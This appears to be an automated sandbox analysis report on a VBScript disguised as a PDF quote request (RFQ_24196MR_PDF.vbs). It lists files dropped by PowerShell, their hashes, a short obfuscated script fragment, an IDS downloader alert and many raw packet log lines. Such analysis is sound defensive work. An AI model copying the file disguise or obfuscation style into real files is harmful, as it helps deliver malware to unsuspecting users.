                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="559246" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):11608
                                              Entropy (8bit):4.8908305915084105
                                              Encrypted:false
                                              SSDEEP:192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
                                              MD5:FE1902820A1CE8BD18FD85043C4D9C5C
                                              SHA1:62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
                                              SHA-256:8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
                                              SHA-512:8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
                                              Malicious:false
                                              Preview:PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):64
                                              Entropy (8bit):1.1940658735648508
                                              Encrypted:false
                                              SSDEEP:3:Nlllultnxj:NllU
                                              MD5:F93358E626551B46E6ED5A0A9D29BD51
                                              SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                              SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                              SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                              Malicious:false
                                              Preview:@...e................................................@..........
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                              Category:dropped
                                              Size (bytes):433020
                                              Entropy (8bit):5.972239123671429
                                              Encrypted:false
                                              SSDEEP:6144:G8Ew64jfYfK/fSl36BSVDiUhDmS3/9jr7RMAhkTcRbDSCgxfDmaCAVUoxQJBdfgu:GMTwFl36BS74ipjh0cRbDAfDmn37dfx
                                              MD5:A26DAC9FF08728614EFD0BB7293E4B33
                                              SHA1:211357003BC276644F821FAAA60CA92687017CED
                                              SHA-256:7D729FCBE3387F6D741992A403615566577A68B4EC2DA2AB230F15DF4D4050BC
                                              SHA-512:48A887F50638607E12326C2B66D4F62FCDDEF4DF018033619E22515B9CA096EAF8A1630734A56B84A4E7B5093433776B56B8FD0001A2A0AD6027F66ADFD1115F
                                              Malicious:false
                                              File type:ASCII text, with CRLF line terminators
                                              Entropy (8bit):4.856034042243113
                                              TrID:
                                              • Visual Basic Script (13500/0) 100.00%
                                              File name:RFQ_24196MR_PDF.vbs
                                              File size:544'034 bytes
                                              MD5:474b9097fcb25c257bedf34672e6bb46
                                              SHA1:67ac04f1e475d3e7402ae654356076cc438dfcd5
                                              SHA256:bb1c7774dbafab1dcdf39f6513f622cb2c9c60324ef033189dd448973911bee6
                                              SHA512:686befa5fd11f2a92388aeda4ae27e1918b5190c441c5f71456a3e8b6a655f64694aeeab86b71a174ec6a6cfddd1cc21911e2dd3616603b6801007cfcbd5933e
                                              SSDEEP:6144:9y/7nXnC3gCY61hPCF1raixrflovpRLOMXfWJi3y1GJUFucXG/KsFhqIPeRK0CeD:W8fY6zm7+v7LOBJe+GPKgPegne1Y7g
                                              TLSH:13C43A65DD2856964D8B27EAFD545A85CAFC812E263300F5FED8034D900A8BCE3FD729
                                              File Content Preview:Function Unrecuperativeness(Prelaticallypipkin,Steeperspremultiplicati)....Kapitalforsikrin = String(95,"I") ....If Steeperspremultiplicati = "Acquaint75" Then ....desalinizingbre = FormatDateTime("8/8/8")....End If..End Function ..Sub trompetisters(Forla
                                              Icon Hash:68d69b8f86ab9a86
                                              Timestamp:2024-10-25T19:44:05.509680+0200
                                              SID:2803270
                                              Signature:ETPRO MALWARE Common Downloader Header Pattern UHCa
                                              Severity:2
                                              Source IP:192.168.2.4
                                              Source Port:49739
                                              Dest IP:142.250.185.238
                                              Dest Port:443
                                              Protocol:TCP
                                              Oct 25, 2024 19:43:31.033565044 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.033763885 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.033833981 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.033849001 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.039083004 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.039123058 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.039148092 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.039174080 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.039258003 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.042970896 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.043164968 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.043234110 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.043260098 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.053334951 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.053395033 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.053426981 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.065782070 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.065853119 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.065881968 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.079901934 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.079957008 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.079983950 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.090424061 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.090500116 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.090521097 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.103101015 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.103154898 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.103180885 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.115047932 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.115103006 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.115129948 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.151161909 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.151227951 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.151228905 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.151247025 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.151273012 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.151334047 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.152096033 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.152189016 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.152211905 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.205419064 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.206345081 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.206397057 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.206433058 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.206464052 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.206803083 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.206824064 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.206840038 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.206851006 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.206887007 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.206892014 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.217148066 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.217183113 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.217205048 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.217231035 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.217406988 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.226016045 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.238327026 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.238343954 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.238459110 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.238497019 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.238554001 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.250679016 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.263063908 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.263144970 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.263153076 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.263179064 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.263331890 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.275327921 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.287784100 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.287811995 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.287853956 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.287884951 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.287944078 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.287957907 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.300062895 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.300132036 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.300160885 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.319026947 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.319092989 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.319113970 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.324826956 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.324902058 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.324918032 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.337331057 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.337420940 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.337439060 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.349611044 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.349690914 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.349715948 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.361706972 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.361783981 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.361799002 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.374070883 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.374154091 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.374169111 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.386810064 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.386887074 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.386915922 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.399076939 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.399146080 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.399162054 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.411108971 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.411223888 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.411246061 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.423767090 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.423858881 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.423880100 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.436182976 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.436374903 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.436394930 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.448146105 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.448235989 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.448255062 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.460448027 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.460562944 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.460578918 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.473016024 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.473068953 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.473093987 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.485028982 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.485095024 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.485117912 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.498029947 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.498112917 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.498131990 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.509752035 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.509962082 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.509975910 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.522180080 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.522305965 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.522322893 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.534560919 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.534661055 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.534682989 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.546864033 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.546931982 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.546957016 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.559320927 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.559386015 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.559426069 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.571624041 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.571688890 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.571712017 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.584304094 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.584501982 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.584546089 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.596509933 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.596566916 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.596599102 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.608722925 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.608787060 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.608798981 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.620906115 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.620980978 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.620995045 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.633167982 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.633260965 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.633282900 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.645747900 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.645806074 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.645831108 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.657857895 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.657910109 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.657927990 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.670293093 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.670341969 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.670361996 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.682604074 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.682672977 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.682687998 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.694933891 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.694992065 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.695027113 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.707318068 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.707375050 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.707390070 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.719580889 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.719652891 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.719671965 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.733807087 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.733859062 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.733875990 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.744395971 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.744442940 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.744457960 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.756834030 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.756880999 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.756896973 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.769275904 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.769328117 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.769341946 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.781759024 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.781819105 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.781841040 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.794958115 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.795007944 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.795026064 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.806123018 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.806174994 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.806189060 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.818600893 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.818653107 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.818669081 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.831968069 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.832010984 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.832021952 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.843291998 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.843342066 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.843353987 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.855578899 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.855618954 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.855639935 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.867980957 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.868010044 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.868035078 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.868050098 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.868091106 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.881200075 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.894078016 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.894109011 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.894124985 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.894155025 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.894186020 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.905785084 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.918245077 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.918279886 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.918303967 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.918324947 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.918356895 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.929687977 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.942187071 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.942240953 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.942243099 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.942256927 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.942605019 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.955993891 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.967525005 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:43:31.969110012 CEST49732443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:43:31.969136953 CEST44349732172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.728132963 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.728205919 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.728370905 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.735739946 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.735801935 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.738624096 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.738707066 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.738728046 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.738771915 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.738782883 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.738825083 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.739145041 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.739204884 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.747900963 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.747978926 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.747984886 CEST44349740172.217.16.193192.168.2.4
